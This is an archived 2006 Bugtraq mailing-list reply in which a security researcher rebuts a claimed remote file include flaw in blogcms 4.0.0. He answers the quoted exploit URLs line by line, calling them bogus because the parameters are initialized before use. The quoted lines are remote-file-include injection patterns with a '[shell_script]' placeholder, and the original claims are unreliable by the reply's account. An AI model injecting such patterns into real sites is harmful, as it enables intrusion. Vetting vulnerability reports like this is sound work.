[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <455E0AB3.1020606@securenetwork.it>
Date: Fri, 17 Nov 2006 20:17:07 +0100
From: Stefano Zanero <s.zanero@...urenetwork.it>
To: bugtraq@...urityfocus.com
Subject: Re: blogcms => 4.0.0 Remote File Include
the_3dit0r@...oo.com wrote:
> # CodE :
> require_once('themes/' . $blog_theme . '/user_style.php');
Bogus...
> # Expl0itS :
> http://Site/[path]/index.php?DIR_PLUGINS=[shell_script]
Bogus, initialized in config file included
> http://Site/[path]/install.php?DIR_LIBS=[shell_script]
Bogus, initialized before being used
> http://Site/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
> http://Site/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]
Classes and functions, that for what I see cannot be called like that.
Stefano
Powered by blists - more mailing lists